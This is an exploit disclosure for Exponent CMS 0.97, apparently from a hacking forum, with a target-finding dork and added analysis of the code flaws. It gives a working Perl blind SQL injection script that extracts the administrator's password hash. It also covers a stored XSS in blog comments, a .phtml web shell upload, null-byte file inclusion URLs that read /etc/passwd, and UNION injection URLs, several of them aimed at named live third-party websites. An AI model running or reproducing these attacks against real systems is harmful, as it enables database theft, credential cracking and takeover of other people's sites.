Exponent CMS
Site: http://exponentcms.org
Dork: "Provided by OIC Group Inc" id
Version: Latest -- 0.97
Code:
default prefix: exponent_
user table: user
auth columns: username,password
Hash: md5($pass)  (unsalted MD5 — a hash recovered with the blind injection below can be attacked offline with an ordinary wordlist)

Remote SQL Injection: Bulletin Board by OIC Group, Inc.

Vuln code: /view_thread.php
PHP:
....
if (!defined("EXPONENT")) exit("");
$bb = null;
$post = null;
$post = $db->selectObject("bb_post","id=".$_GET['id']);
# Note: the second field (parent) is also used in the query below.
if ($post && $post->parent != 0) $post = $db->selectObject("bb_post","id=".$post->parent);
....
...
$_GET['id'] is concatenated straight into the WHERE clause with no cast or quoting, and the parent field of the returned row is concatenated into a second query the same way. Note that the caller uses selectObject (singular) while the helper quoted below is selectObjects (plural); presumably the singular wrapper builds the same unescaped WHERE clause, but that code is not shown here.
PHP:
....
function selectObjects($table, $where = null,$orderby = null) {
    if ($where == null) $where = "1";
    if ($orderby == null) $orderby = '';
    else $orderby = "ORDER BY " . $orderby;
    $res = @mysqli_query($this->connection, "SELECT * FROM `" . $this->prefix . "$table` WHERE $where $orderby");
    if ($res == null) return array();
    $objects = array();
    for ($i = 0; $i < mysqli_num_rows($res); $i++) $objects[] = mysqli_fetch_object($res);
    return $objects;
}
....
The query is assembled by string concatenation ("WHERE $where $orderby") and run with error suppression (@mysqli_query), so a malformed injected query fails silently and just yields an empty array — no error text to use as an oracle.
I built an exploit with a sub-query nested into that second field, but still could not find any place where the result is echoed. So the data is pulled out one character at a time (boolean-based blind injection).
Exploit:
Code:
#!/usr/bin/perl
use strict;
use LWP::Simple;
&usage;
my $host = shift;
my $id = shift;
$|=1;
my $n=48;
my $i =1;
my $loop = 1;
my ($content,$result) = undef;
my $request = 0;
print "Administrator hash: ";
while($loop) {
    $content = get($host.'/bbmodule/view_thread/id/'.$id.'+and+if(ascii(upper(substring((select+password+from+exponent_user+where+id=1),'.$i.',1)))='.$n.',1,0)');
    if($content =~ /Posted on/) {print $result=chr($n); $n=47; $i++;}
    elsif($i==33) {$loop = 0}
    else {$n++; if($n==58){$n=65} }
    $request++;
}
print "\nREQUEST: ".$request;
sub usage {
    print q {
#################################################################
Exponent Bulletin Board Blind SQL Injection Exploit (id)
Author: ZAMUT
Vuln: id=
Homepage: http://antichat.ru
Usage: expon.pl [Server] [Valid Id]
Example: perl expon.pl http://bla.ru 2
#################################################################
};
}
How the script works: each request appends "and if(ascii(upper(substring((select password from exponent_user where id=1),$i,1)))=$n,1,0)" to a valid post id and uses the presence of the string "Posted on" in the response as the true/false oracle. $n walks 48–57 ('0'–'9') and then jumps to 65 ('A'–'F'), which is exactly the alphabet of an upper-cased MD5 hex digest; a hit prints the character and advances $i, and the loop stops once 32 characters have been recovered ($i==33). The targeted row is whatever has id=1 in exponent_user, assumed here to be the administrator.
Caveats: $n has no upper bound, so if a position never matches (wrong id, a theme that does not print "Posted on", a non-hex password value) the script increments $n forever instead of aborting — a guard such as `last if $n > 70;` inside the else branch is advisable. Likewise &usage; only prints the banner and never exits, so running the script with missing arguments does not fail on the usage check; it falls into the same endless loop against an undefined host.

Active (stored) XSS: Module Weblog / Online Journal
When leaving a comment, the "Name" field is vulnerable.
Vuln code: /comment_save.php
PHP:
if (isset($comment->id)) {
    $comment->editor = $user->id;
    $comment->edited = time();
    $db->updateObject($comment,'weblog_comment');
} else {
    $comment->posted = time();
    if (isset($user) && $user->id != 0) {
        $comment->poster = $user->id;
        $comment->name = $user->username;
    } elseif (isset($_POST['name'])) {
        $comment->name = $_POST['name'];
    } else {
        $comment->name = 'Anonymous';
    }
    $comment->parent_id = intval($_POST['parent_id']);
    $db->insertObject($comment,'weblog_comment');
}
...
The POST value is copied into $comment->name without any encoding. Note that this branch is only taken for anonymous posters (an authenticated user gets $user->username instead), so the stored XSS is reachable without an account, and that parent_id right below is cast with intval() while name is not. The only transformation applied before storage is the SQL quote-escaping in insertObject below — no HTML encoding; the code that later renders the name is not shown on this page.
/postgres.php
PHP:
function insertObject($object,$table) {
    $sql = "INSERT INTO " . $this->prefix.$table . " (";
    $values = ") VALUES (";
    foreach (get_object_vars($object) as $var=>$val) {
        $sql .= "$var,";
        $values .= "'".str_replace("'","\\'",$val)."',";
    }
    if (pg_query($this->connection,substr($sql,0,-1).substr($values,0,-1) . ")") !== false) {
        $sql = "SELECT last_value FROM " .
$this->prefix.$table ."_id_seq";
        $res = @pg_query($this->connection,$sql);
        if ($res) {
            $o = pg_fetch_object($res);
            pg_free_result($res);
            return $o->last_value;
        } else return 0;
    } else return 0;
}
Note that the hand-rolled escaping in insertObject only rewrites ' to \' and does not use pg_escape_string(); whether a backslash in the input can break out of the literal depends on the server's string-escaping configuration, which this page does not examine.

Shell: Manage Files => Upload => shell.phtml
Code:
http://localhost/exp/files/shell.phtml
The /files directory contains this .htaccess:
Code:
# secure directory by disabling script execution
AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi
Options -ExecCGI
This is an extension blacklist: it maps the listed extensions to the CGI handler and then disables CGI execution, but .phtml is not in the list, so on a typical mod_php setup where .phtml is mapped to the PHP handler the uploaded file still executes. Manage Files appears to be an administrative feature, so this presumably needs a privileged account. The robust fix is to allow only a whitelist of extensions on upload and to turn off script execution for the whole directory (e.g. php_flag engine off on mod_php, or serving uploads from a non-executable location) rather than enumerating extensions.
P.S. The vulnerable modules ship with the CMS by default.
(c) ZAMUT
Call chain for the local file inclusion below: index.php includes the active theme's index.php, which calls exponent_theme_main(), which dispatches to exponent_theme_runAction(), where the include path is built from request parameters (the continuation of that function, with the include itself, follows below).
index.php
PHP:
...
$page = exponent_theme_getTheme();
// If we are in a printer friendly request then we need to change to our printer friendly subtheme
if (PRINTER_FRIENDLY == 1) {
    exponent_sessions_set("uilevel",0);
    $pftheme = exponent_theme_getPrinterFriendlyTheme(); // get the printer friendly theme
    $page = $pftheme == null ? $page : $pftheme; // if there was no theme found then just use the current subtheme
}
$base_i18n = exponent_lang_loadFile('index.php');
if (is_readable($page)) {
    if (!exponent_javascript_inAjaxAction()) {
        include_once($page);
themes/coolwatertheme/index.php
PHP:
<?php exponent_theme_main(); ?>
subsystems/theme.php
PHP:
function exponent_theme_main() {
    global $db, $user;
    echo show_msg_queue();
    if ((!defined("SOURCE_SELECTOR") || SOURCE_SELECTOR == 1) && (!defined("CONTENT_SELECTOR") || CONTENT_SELECTOR == 1)) {
        $last_section = exponent_sessions_get("last_section");
        $section = $db->selectObject("section","id=".$last_section);
        // View authorization will be taken care of by the runAction and mainContainer functions
        if (exponent_theme_inAction()) {
            exponent_theme_runAction();

function exponent_theme_runAction() {
    if (exponent_theme_inAction()) {
        if (!AUTHORIZED_SECTION) {
            echo SITE_403_HTML;
            // return;
        }
        if (exponent_sessions_isset("themeopt_override")) {
            $config = exponent_sessions_get("themeopt_override");
            echo "<a class='mngmntlink sitetemplate_mngmntlink' href='".$config['mainpage']."'>".$config['backlinktext']."</a><br /><br />";
        }
        if (isset($_REQUEST['controller'])) {
            echo renderAction($_REQUEST);
        } else {
            if ($_REQUEST['action'] == 'index') {
                $view = empty($_REQUEST['view']) ? 'Default' : $_REQUEST['view'];
                $title = empty($_REQUEST['title']) ? '' : $_REQUEST['title'];
                $src = empty($_REQUEST['src']) ? null : $_REQUEST['src'];
                exponent_theme_showModule($_REQUEST['module'], $view, $title, $src);
                return true;
            }
            global $db, $user;
            $loc = null;
            $loc->mod = $_REQUEST['module'];
            $loc->src = (isset($_REQUEST['src']) ?
Note the commented-out "// return;" after echo SITE_403_HTML: when AUTHORIZED_SECTION is false the 403 page is printed, but execution falls straight through into the action dispatch, so that check does not stop the include. What AUTHORIZED_SECTION actually covers is not visible here.
$_REQUEST['src'] : "");
            $loc->int = (isset($_REQUEST['int']) ? $_REQUEST['int'] : "");
            $actfile = "/" . $_REQUEST['module'] . "/actions/" . $_REQUEST['action'] . ".php";
            if (isset($_REQUEST['_common'])) $actfile = "/common/actions/" . $_REQUEST['action'] . ".php";
            if (is_readable(BASE."themes/".DISPLAY_THEME_REAL."/modules".$actfile)) {
                include_once(BASE."themes/".DISPLAY_THEME_REAL."/modules".$actfile);
            } elseif (is_readable(BASE.'modules/'.$actfile)) {
                include_once(BASE.'modules/'.$actfile);
Both $_REQUEST['module'] and $_REQUEST['action'] are concatenated into the include path with no sanitisation, so either one can carry ../ sequences. The fixed ".php" suffix is cut off with a %00 null byte, which only works when magic_quotes_gpc is Off (otherwise the byte arrives escaped as \0) and on PHP versions that still accept null bytes in filesystem paths (before 5.3.4). The only guard is is_readable(), so any file the web server can read is included.

LFI (mq=off, i.e. magic_quotes_gpc = Off)
http://localhost/?action=../../../../../../../../boot.ini%00&module=loginmodule
http://localhost/?action=login&module=../../../../../../../../boot.ini%00
http://demo.demolabo.com/exponent/en/?action=../../../../../../../../../../../etc/passwd%00&module=loginmodule
---------------
modules/articlemodule/actions/view_article.php
PHP:
if (!defined("EXPONENT")) exit("");
$article = null;
if (isset($_GET['id'])) {
    $article = $db->selectObject("article","id=".$_GET['id']);
subsystems/database/mysqli.php
PHP:
function selectObjects($table, $where = null,$orderby = null) {
    if ($where == null) $where = "1";
    if ($orderby == null) $orderby = '';
    else $orderby = "ORDER BY " . $orderby;
    $res = @mysqli_query($this->connection, "SELECT * FROM `" . $this->prefix . "$table` WHERE $where $orderby");
    if ($res == null) return array();
    $objects = array();
    for ($i = 0; $i < mysqli_num_rows($res); $i++) $objects[] = mysqli_fetch_object($res);
    return $objects;
}
Same unescaped concatenation of $_GET['id'] into the WHERE clause as in the bulletin board, but here the selected row is rendered, so a UNION SELECT (six columns for the article table) returns data directly in the page.
SQL
http://localhost/index.php?action=view_article&module=articlemodule&id=-1+union+select+1,2,3,version(),user(),6+--+
http://www.exponentcms.org/index.php?action=view_article&module=articlemodule&id=-1+union+select+1,2,3,version(),user(),6+--+
(exponentcms.org closed this SQL injection quickly: at first the site returned a message along the lines of "go away, hacker", which was later changed to "bad query!". Hence one more URL below for verification.)
http://rickandbernie.net/?action=view_article&module=articlemodule&id=-1+union+select+1,2,3,version(),user(),6+--+
----------------
modules/imagegallerymodule/actions/image_to_panel.php
PHP:
if (!defined("EXPONENT")) exit("");
$image = null;
if (isset($_GET['id'])) {
    $image = $db->selectObject("imagegallery_image","id=".$_GET['id']);
}
if ($image) {
    $image->file = $db->selectObject("file","id=".$image->file_id);
    echo json_encode($image);
} else {
    echo SITE_404_HTML;
}
Same pattern — $_GET['id'] concatenated into the WHERE clause — but this is the most convenient extraction point of the three, because the resulting object is emitted verbatim with json_encode(), so every column of an injected UNION row (11 columns here) comes back in the response. Note also that the follow-up lookup on the "file" table takes $image->file_id from that same attacker-controlled row and concatenates it into a second query.
SQL
http://localhost/index.php?action=image_to_panel&module=imagegallerymodule&id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11+--+